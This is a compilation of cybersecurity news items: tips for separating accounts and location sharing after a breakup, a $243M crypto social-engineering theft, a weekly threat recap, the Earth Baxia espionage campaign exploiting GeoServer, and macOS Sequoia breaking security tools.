*   Check your security settings in your online accounts to review what devices are currently logged into the same account. If you see a device that does not belong to you, force that device to be logged out.
    
    *   If you take this step after successfully resetting your password, those devices will be required to use the new password (which only you should know).
    
    *   These settings can often be found in “security” or “privacy and security” tabs in most apps.

**5\. **Review the location settings of your device****

*   Your device provides a way to comprehensively turn off **all** location services that apps rely on to function. With this feature turned off, location-based apps (such as Uber, Uber Eats, Airbnb, Yelp, Maps, etc.) will still function, but you will need to input your address and location manually each time you use the service.
    
    *   You can review location sharing settings on iPhone here.
    
    *   You can review location sharing settings on Android here.

**6\. **Review “Find My/Find My Device” settings****

*   Modern devices come pre-installed with anti-theft services called “Find My” on iPhones and “Find My Device” on Android phones. These are the same services that many couples use to track one another’s location, and turning these services off will shut off access that other people (including exes, friends, and family) have to your location.
    
    *   Alternatively, you can turn off location sharing with one person only rather than turning off location sharing all together. You can review location sharing settings on iPhone here.
    
    *   You can review location sharing settings on Android here.

**7\. **Review the location settings of individual apps****

*   If you want to keep location sharing on for convenience, you can review individual apps on your device and select how you would like your location to be accessed by those apps.
    
    *   iPhones allow you to choose one of several options for how frequently apps will access and use your location: Never, Ask Next Time Or When I Share, While Using the App, or Always. You can review location sharing settings on iPhone here.
    
    *   Android phones allow you to choose one of several options for how frequently apps will access and use your location: Allowed all the time, Allowed only while in use, and Not allowed.
    *   You can review location sharing settings on Android here.

**8\. **Maintain your ongoing security and privacy****

*   If you find it safe and necessary, block your ex on certain social media platforms, messaging apps, etc.
*   Review the privacy settings of social media apps to ensure that your posts are not inadvertently shared with an ex.
    *   Consider whether your ex could see your posts because you have mutual friends who may reveal your posts to your ex.
*   Review automatic cloud backups for photos you take with your smartphone.
    *   If your ex compromises your iCloud or Google Photos account—and your photos are automatically backed up to those accounts—they could retrieve sensitive photos that you want to keep private.
*   When entering a new relationship, have a conversation about consensually and safely sharing your location (or choosing not to).

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Relationship broken up? Here&#8217;s how to separate your online accounts 

Hackers stole $243M from a single victim by posing as Google and Gemini support, resetting 2FA to access…

Hackers stole $243M from a single victim by posing as Google and Gemini support, resetting 2FA to access crypto. Investigator ZachXBT helped trace the thieves, leading to arrests and the recovery of millions.

A major breakthrough in cryptocurrency theft came to light on September 19, 2024, when anonymous Twitter user and crypto investigator ZachXBT (@ZachXBT) revealed his investigation into one of the largest crypto heists in history.

The theft of $243 million worth of cryptocurrency from a single Genesis creditor, was carried out through a sophisticated **social engineering attack** in August 2024. ZachXBT’s investigation played a key role in tracing the alleged culprits, which led to multiple arrests and the recovery of millions in stolen funds.

****The Heist****

On August 19, 2024, a group of cybercriminals identified as Greavys (Malone Iam), Wiz (Veer Chetal), and Box (Jeandiel Serrano) allegedly conducted a phishing operation targeting a victim in Washington, D.C.

The attackers, posing as support personnel from Google and Gemini, tricked the victim into resetting two-factor authentication (**2FA**) and transferring funds to a compromised wallet. The group further exploited the victim using remote access software **AnyDesk** to reveal private keys stored in the victim’s Bitcoin core.

ZachXBT provided transaction hashes that tracked the flow of Bitcoin, confirming that 59.34 BTC and 14.88 BTC were stolen during the attack, followed by the transfer of a massive 4,064 BTC, worth $243 million at the time, which was quickly split among the attackers.

> 3/ Here is a private video recording showing the live reaction by multiple of the threat actors to receiving $238M.
> 
> Theft txn hash  
> 4064 BTC – Aug 19 at 4:05 am UTC  
> 4b277ba298830ea538086114803b9487558bb093b5083e383e94db687fbe9090 pic.twitter.com/djSxBTkOF8
> 
> — ZachXBT (@zachxbt) September 19, 2024

**Criminals’ Identities Unveiled**

According to ZachXBT’s in-depth investigation, the details of which he shared in a _must read_ **detailed Twitter thread**, revealed the identities of the thieves. Allegedly, Wiz (Veer Chetal) made a critical error during a screenshare session, where his real name was exposed.

Furthermore, he and his friend Aakaash (Light/Dark) allegedly attempted to launder the stolen funds through exchanges such as eXch and Thorswap. Despite efforts to cover their tracks, they linked laundered funds to the stolen assets by reusing addresses.

Greavys, a key figure in the scam, flaunted his newfound wealth by purchasing luxury items, including over 10 cars and expensive nights out in Los Angeles and Miami. His flashy lifestyle, documented on social media, helped investigators track his location.

Box (Jeandiel Serrano), who impersonated a Gemini representative during the heist, also left traces linking him to the stolen funds. A shared profile picture across multiple platforms and a series of missteps in cryptocurrency transactions allowed investigators to trace $18 million back to him.

Screenshot credit: ZachXBT

**Arrests and Asset Recovery**

ZachXBT’s collaboration with **@CFInvestigators**, **@zeroshadow\_io**, and the Binance Security Team resulted in the freezing of over $9 million in assets, with $500,000 already returned to the victim. His findings also led to the arrest of Greavys and Box, who were taken into custody in Miami and Los Angeles, respectively, on September 18, 2024.

**Legal Proceedings**

The Department of Justice (DOJ) confirmed the arrests in a **press release**, announcing charges of conspiracy to steal and launder cryptocurrency against Malone Lam (aka “Anne Hathaway” and “$$$”) and Jeandiel Serrano (aka “VersaceGod” and “@SkidStar”).

The indictment outlines how the pair, alongside other conspirators, executed a series of crypto thefts, using complex laundering techniques to conceal the funds. Both individuals appeared in U.S. District Court following their arrests.

ZachXBT’s investigative work played a crucial role in cracking one of the largest cryptocurrency theft cases of the year. As law enforcement continues to crack the network behind the crime, ZachXBT has stated that updates will follow as the legal proceedings unfold.

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Pink Drainer Posed as Journalists, Stole $3M from Twitter Users**
3.  **Hackers Stole $59 Million of Crypto Via Malicious Google, X Ads**
4.  **Crypto Scammer Returns $9.27 Million Out of $24M Crypto Theft**
5.  **Crypto losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed**

Hackers Posed as Google Support to Steal $243 Million in Crypto

Hold on tight, folks, because last week's cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let's dive into the details and see what lessons we can glean

Cybersecurity / Cyber Threat

Hold on tight, folks, because last week's cybersecurity landscape was a rollercoaster! We witnessed everything from North Korean hackers dangling "dream jobs" to expose a new malware, to a surprising twist in the Apple vs. NSO Group saga. Even the seemingly mundane world of domain names and cloud configurations had its share of drama. Let's dive into the details and see what lessons we can glean from the past week.

****⚡ Threat of the Week****

**Raptor Train Botnet Dismantled:** The U.S. government announced the takedown of the Raptor Train botnet controlled by a China-linked threat actor known as Flax Typhoon. The botnet consisted of over 260,000 devices in June 2024, with victims scattered across North America, Europe, Asia, Africa, and Oceania, and South America. It also attributed the Flax Typhoon threat actor to a publicly-traded, Beijing-based company known as Integrity Technology Group.

****🔔 Top News****

*   **Lazarus Group's New Malware:** The North Korea-linked cyber espionage group known as UNC2970 (aka TEMP.Hermit) has been observed utilizing job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN. The activity is also tracked as Operation Dream Job.
*   **iServer and Ghost Dismantled:** In yet another big win for law enforcement agencies, Europol announced the takedown of an international criminal network that leveraged a phishing platform to unlock stolen or lost mobile phones. The agency, in partnership with the Australian Federal Police (AFP), dismantled an encrypted communications network called Ghost that enabled serious and organized crime across the world.
*   **Iranian APT Acts as Initial Access Provider:** An Iranian threat actor tracked as UNC1860 is acting as an initial access facilitator that provides remote access to target networks by deploying various passive backdoors. This access is then leveraged by other Iranian hacking groups affiliated with the Ministry of Intelligence and Security (MOIS).
*   **Apple Drops Lawsuit against NSO Group:** Apple filed a motion to "voluntarily" dismiss the lawsuit it's pursuing against Israeli commercial spyware vendor NSO Group, citing a shifting risk landscape that could lead to exposure of critical "threat intelligence" information. The lawsuit was filed in November 2021.
*   **Phishing Attacks Exploit HTTP Headers:** A new wave of phishing attacks is abusing refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users' credentials. Targets of the campaigns include entities in South Korea and the U.S.

****📰 Around the Cyber World****

*   **Sandvine Leaves 56 "Non-democratic" Countries:** Sandvine, the company behind middleboxes that have facilitated the delivery of commercial spyware as part of highly-targeted attacks, said it has exited 32 countries and is in process of ceasing operations in another 24 countries, citing elevated threats to digital rights. Earlier this February, the company was added to the U.S. Entity List. "The misuse of deep packet inspection technology is an international problem that threatens free and fair elections, basic human rights, and other digital freedoms we believe are inalienable," it said. It did not disclose the list of countries it's exiting as part of the overhaul.
*   **.mobi Domain Acquired for $20:** Researchers from watchTowr Labs spent a mere $20 to acquire a legacy WHOIS server domain associated with the .mobi top-level domain (TLD) and set up a WHOIS server on that domain. This led to the discovery that over 135,000 unique systems still queried the old WHOIS server over a five day period ending on September 4, 2024, including cybersecurity tools and mail servers for government, military and university entities. The research also showed that the TLS/SSL process for the entire .mobi TLD had been undermined as numerous Certificate Authorities (CAs) were found to be still using the "rogue" WHOIS server to "determine the owners of a domain and where verification details should be sent." Google has since called for stopping the use of WHOIS data for TLS domain verifications.
*   **ServiceNow Misconfigurations Leak Sensitive Data:** Thousands of companies are inadvertently exposing secrets from their internal knowledge base (KB) articles via ServiceNow misconfigurations. AppOmni attributed the issue to "outdated configurations and misconfigured access controls in KBs," likely indicating "a systematic misunderstanding of KB access controls or possibly the accidental replication of at least one instance's poor controls to another through cloning." ServiceNow has published guidance on how to configure their instances to prevent unauthenticated access to KB articles.
*   **Google Cloud Document AI Flaw Fixed:** Speaking of misconfigurations, researchers have found that overly permissive settings in Google Cloud's Document AI service could be leveraged by threat actors to hack into Cloud Storage buckets and steal sensitive information. Vectra AI described the vulnerability as an instance of transitive access abuse.
*   **Microsoft Plans End of Kernel Access for EDR Software:** Following the massive fallout from the CrowdStrike update mishap in July 2024, Microsoft has highlighted Windows 11's "improved security posture and security defaults" that allow for more security capabilities to security software makers outside of kernel mode access. It also said it will collaborate with ecosystem partners to achieve "enhanced reliability without sacrificing security."

**🔥 **Cybersecurity Resources & Insights******— **Upcoming Webinars****

*   **Zero Trust: Anti-Ransomware Armor**: Join our next webinar with Zscaler's Emily Laufer for a deep dive into the 2024 Ransomware Report, uncovering the latest trends, emerging threats, and the zero-trust strategies that can safeguard your organization. Don't become another statistic – Register now and fight back!
*   **SIEM Reboot: From Overload to Oversight:** Drowning in data? Your SIEM should be a lifesaver, not another headache. Join us to uncover how legacy SIEM went wrong, and how a modern approach can simplify security without sacrificing performance. We'll dive into the origins of SIEM, its current challenges, and our community-driven solutions to cut through the noise and empower your security. Register now for a fresh take on SIEM!

**— **Ask the Expert****

*   **Q:** How does Zero Trust differ fundamentally from traditional Perimeter Defense, and what are the key challenges and advantages when transitioning an organization from a Perimeter Defense model to a Zero Trust architecture?

*   **A:** Zero Trust and perimeter defense are two ways to protect computer systems. Zero Trust is like having multiple locks on your doors AND checking IDs at every room, meaning it trusts no one and constantly verifies everyone and everything trying to access anything. It's great for stopping hackers, even if they manage to sneak in, and works well when people work from different places or use cloud services. Perimeter defense is like having a strong wall around your castle, focusing on keeping the bad guys out. But, if someone breaks through, they have easy access to everything inside. This older approach struggles with today's threats and remote work situations. Switching to Zero Trust is like upgrading your security system, but it takes time and money. It's worth it because it provides much better protection. Remember, it's not just one thing, but a whole new way of thinking about security, and you can start small and build up over time. Also, don't ditch the wall completely, it's still useful for basic protection.

**— **Cybersecurity Jargon Buster****

*   **Polymorphic Malware:** Imagine a sneaky virus that keeps changing its disguise (signature) to trick your antivirus. It's like a chameleon, making it tough to catch.
*   **Metamorphic Malware:** This one's even trickier! It's like a shapeshifter, not just changing clothes, but completely transforming its body. It rewrites its own code each time it infects, making it nearly impossible for antivirus to recognize.

**— **Tip of the Week****

**"Think Before You Click" Maze:** Navigate a series of decision points based on real-world scenarios, choosing the safest option to avoid phishing traps and other online threats.

****Conclusion****

"To err is human; to forgive, divine." - Alexander Pope. But in the realm of cybersecurity, forgiveness can be costly. Let's learn from these mistakes, strengthen our defenses, and keep the digital world a safer place for all.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

THN Cybersecurity Recap: Last Week's Top Threats and Trends (September 16-22)

The APT group uses spear-phishing and a vulnerability in a geospatial data-sharing server to compromise organizations in Taiwan, Japan, the Philippines, and South Korea.

Source: kb-photodesign via Shutterstock

A China-linked cyber-espionage group has attacked Taiwanese government agencies, the Philippine and Japanese military, and energy companies in Vietnam, installing either the Cobalt Strike client or a custom backdoor known as EagleDoor on compromised machines.

Dubbed Earth Baxia by cybersecurity firm Trend Micro, the group primarily uses spear-phishing to compromise victims, but it has also exploited a vulnerability (CVE-2024-36401) in the open source GeoServer software used to distribute geospatial data. The group uses public cloud services for hosting malicious files, and appears not to be connected to other known advance persistent threat (APT) groups, although at least one analysis has found overlap between APT41 — also known as Wicked Panda and Brass Typhoon.

The majority of the group's infrastructure is based in China, and its attacks target nations of Chinese national interest, says Ted Lee, a threat researcher with Trend Micro.

"In recent campaigns, their primary targets are government agencies and other critical infrastructures — \[such as\] telecommunication — in the APAC region," he says. "In addition, we also found the decoy documents they used to lure victims are related to some significant conferences or international meetings."

The attack comes as China appears to be ramping up its attacks on governments and companies in the Asia-Pacific region. Operation Crimson Palace, a collection of three Chinese APT groups working in concert, has successfully compromised more than a dozen targets in Southeast Asia, including government agencies. In another recent case, a Chinese espionage group used a malicious fake document in an attempt to compromise systems at the US-Taiwan Business Council, prior to its 23rd US-Taiwan Defense Industry Conference.

**Spear-Phishing, With a Side of GeoServer**

The latest attacks primarily employ spear-phishing, either sending a file or a link, using regional conferences as a lure.

"Based on the collected phishing emails, decoy documents, and observations from incidents, it appears that the targets are primarily government agencies, telecommunication businesses, and the energy industry in the Philippines, South Korea, Vietnam, Taiwan, and Thailand," Trend Micro stated in its analysis. "Notably, we also discovered a decoy document written in simplified Chinese, suggesting that China is also one of the impacted countries. However, due to limited information, we cannot accurately determine which sectors in China are affected."

In a limited number of cases, Trend Micro has noticed that the threat group uses a known flaw in the open source geospatial sharing service GeoServer to gain a beachhead within an organization. The GeoServer attacks appear to have started at least two months ago, with the Shadowserver Foundation noting that the attack first appeared in its logs on July 9. The Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability to its Known Exploited Vulnerability (KEV) catalog on July 15.

Whether it uses a vulnerability or spear-phishing, the next step is to use one of two techniques, dubbed GrimResource and AppDomainManager injection, to further compromise targeted systems.

Discovered in June, GrimResource uses a cross-site scripting (XSS) flaw to execute JavaScript on the victim's machine and, together with a second exploit, gain arbitrary code execution. AppDomainManager injection is an older — but still not widely known — technique that can be used to load run malicious code and is starting to be abused by state-backed groups, NTT Security stated in an analysis (via Google Translate).  
"Since this method is not widely known at this time, it is clear that it is a unilateral advantage for the attackers," the translated analysis stated. "As a result, there is concern about the possibility that such attacks will expand in the future."

**All Roads Lead to Cobalt Strike?**

Compromise in any case leads either to a custom backdoor known as EagleDoor, or the installation of an implant by a pirated version of the red-team tool Cobalt Strike, whose use is common among cybercriminal and cyber-espionage groups because of its powerful lateral movement and command-and-control (C2) capabilities.

In addition, the commonness of the tool means investigators gain no attribution information from its use, Trend Micro's Lee says.

"While its use can be a red flag, attackers often modify its components to evade detection," he says. "On the other hand, it’s difficult for analysts to finish group attribution based on Cobalt Strike because it is a shared tool used by many different groups."

The Cobalt Strike component drops two executables, Hook and Eagle, which make up the EagleDoor backdoor, which allows communication over DNS, HTTP, TCP, and Telegram. The commands are used to exfiltrate data from the victim's system and installing additional payloads, Trend Micro stated in its analysis.

**About the Author**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

China's 'Earth Baxia' Spies Exploit Geoserver to Target APAC Orgs

Apple’s macOS Sequoia update is causing major compatibility issues with popular security tools. Reportedly, users are facing disruptions…

Apple’s macOS Sequoia update is causing major compatibility issues with popular security tools. Reportedly, users are facing disruptions and frustration as vendors scramble to find solutions. Learn about the affected software, potential workarounds, and the latest updates on this ongoing issue.

Apple’s latest macOS update, macOS Sequoia (version 15), is reportedly causing issues with security tools from major providers like CrowdStrike, SentinelOne, ESET, and Microsoft. The update appears incompatible with several popular security tools, rendering them inoperable. The issue, which affects macOS users and enterprises, has caused frustration among those working with macOS-focused security tools. 

For your information, Apple officially launched its AI-focused macOS Sequoia on Monday. It is a new operating system, first revealed at WWDC 2024, offering exclusive features like Apple Intelligence, which uses Apple silicon to create language, images, and actions across apps, leveraging users’ personal context. 

However, the update has raised concerns for certain security-related products and applications as several security researchers and users on social media, Reddit, and a Mac-focused Slack channel reported issues with these security tools after installing Sequoia.

On Mastodon, security researcher Will Dormann reported firewall-related and DNS issues in macOS Sequoia, noting that blocking incoming connections within the macOS Sequoia firewall can also block replies to DNS requests, causing problems.

Dormann also noted a related issue affecting Chrome and Chromium-based browsers on macOS Sequoia, where blocking incoming connections for Google Chrome in the macOS firewall causes large downloads to stall.

Meanwhile, Apple has not yet addressed the concerns regarding Sequoia’s compatibility with security software such as ESET Endpoint Security and CrodStrike Falcon, and the full scope of the compatibility issues with Sequoia remains unclear.  

Most companies have advised users not to update the OS until the issue is resolved, as they are unable to support macOS Sequoia. CrowdStrike confirmed the issue and announced a delay in supporting Sequoia.

The company is waiting for Apple to release a fix before updating their software.  Similarly, ESET acknowledged network connection problems after the update but later clarified that their products are compatible with Sequoia. 

While SentinelOne initially advised users against upgrading to Sequoia, they later clarified that full support was available. However, some users still reported problems with other functionalities like firewalls and DNS configurations. 

A potential workaround shared by security researcher Wacław Jacek on his blog involves using command-line tools to adjust firewall settings for specific applications. According to Jacek, to modify firewall settings, use the CLI tool /usr/libexec/ApplicationFirewall/socketfilterfw.

This will allow your browser to access the internet again, but other software may still not function. To disable the entire firewall, open the terminal app, find the path to your web browser, run ls -l, and add your browser to the firewall using /usr/libexec/ApplicationFirewall/socketfilterfw.

Until the situation is resolved, please proceed with caution when considering the Sequoia update, especially if you rely heavily on third-party security software.

Mr. Mayuresh Dani, Manager, Security Research, at Qualys Threat Research Unit, shared his concern over the situation with Hackread.com stating, “With the release of new operating systems, all security vendors must test and qualify their releases. It is a good thing that security vendors have been proactive in this situation and have already sent out steps to take in case their systems are facing issues with the latest Mac update.”

Mayuresh highlighted that “From the looks of it, the networking stack – or the macOS Sequoia firewall to be specific – has changed because the security tools that use it to provide security are not able to do so. Not just security tools, VPNs are also having a difficult time getting a DNS resolution.”

He also suggested the following to the security teams responsible for securing Macs:

1.  Avoid updating to macOS Sequoia unless their security vendor has officially certified it for use.
2.  Turn off auto-updates to major OS releases before internal certification.
3.  Internally certify new operating system releases by installing Dev, and Beta builds of operating systems with certified software before organization-wide deployments.

Nevertheless, the importance of comprehensive testing before deploying major updates in production environments should not be ignored. It also highlights the need for organizations to have proper backup plans and alternative security measures in place. Developing a multi-layered security approach that doesn’t rely solely on a single tool or vendor can enhance overall stability.

1.  **CrowdStrike Update Causes Havoc By Disrupting Businesses**
2.  **Webroot Marked Facebook as Phishing Site, Windows as Malware**
3.  **Apple mistakenly approved malware hidden as Adobe Flash Player**
4.  **Microsoft Releases Tool to Fix CrowdStrike-Caused Windows Chaos**
5.  **Microsoft Defender Flags Tor Browser as Win32/Malgent!MTB Malware**

Tag

#google